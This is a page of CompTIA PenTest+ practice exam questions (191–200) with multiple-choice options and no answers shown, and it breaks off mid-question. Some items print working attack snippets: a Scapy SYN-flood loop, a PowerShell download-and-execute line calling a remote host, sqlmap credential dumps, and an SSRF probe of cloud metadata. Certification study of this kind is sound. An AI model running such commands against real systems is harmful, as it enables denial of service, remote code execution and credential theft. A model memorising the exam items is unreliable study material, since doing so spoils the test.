Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :271 Q&As
  • Last Updated
    :Mar 30, 2025

CompTIA CompTIA Certifications PT0-003 Questions & Answers

  • Question 191:

    A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?

    A. SAST

    B. Sidecar

    C. Unauthenticated

    D. Host-based

  • Question 192:

    A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

    A. Censys.io

    B. Shodan

    C. Wayback Machine

    D. SpiderFoot

  • Question 193:

    During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?

    A. Clear the Windows event logs.

    B. Modify the system time.

    C. Alter the log permissions.

    D. Reduce the log retention settings.

  • Question 194:

    A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?

    A. Testing window

    B. Terms of service

    C. Authorization letter

    D. Shared responsibilities

  • Question 195:

    During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

    A. SQL injection

    B. SSRF

    C. XSS

    D. Server-side template injection

  • Question 196:

    A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?

    A. Cryptographic flaws

    B. Protocol scanning

    C. Cached pages

    D. Job boards

  • Question 197:

    A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:

    ip = IP("192.168.50.2")

    tcp = TCP(sport=RandShort(), dport=80, flags="S")

    raw = RAW(b"X"*1024)

    p = ip/tcp/raw

    send(p, loop=1, verbose=0)

    Which of the following attack types is most likely being used in the test?

    A. MDK4

    B. Smurf attack

    C. FragAttack

    D. SYN flood

  • Question 198:

    Given the following script:

    $1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]

    If ($1 -eq "administrator") {

    echo IEX(New-Object

    Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell - noprofile -}

    Which of the following is the penetration tester most likely trying to do?

    A. Change the system's wallpaper based on the current user's preferences.

    B. Capture the administrator's password and transmit it to a remote server.

    C. Conditionally stage and execute a remote script.

    D. Log the internet browsing history for a systems administrator.

  • Question 199:

    During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?

    A. sqlmap -u www.example.com/?id=1 --search -T user

    B. sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

    C. sqlmap -u www.example.com/?id=1 --tables -D accounts

    D. sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

  • Question 200:

    A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?

    A. curl ?param=http://169.254.169.254/latest/meta-data/

    B. curl '?param=http://127.0.0.1/etc/passwd'

    C. curl '?param=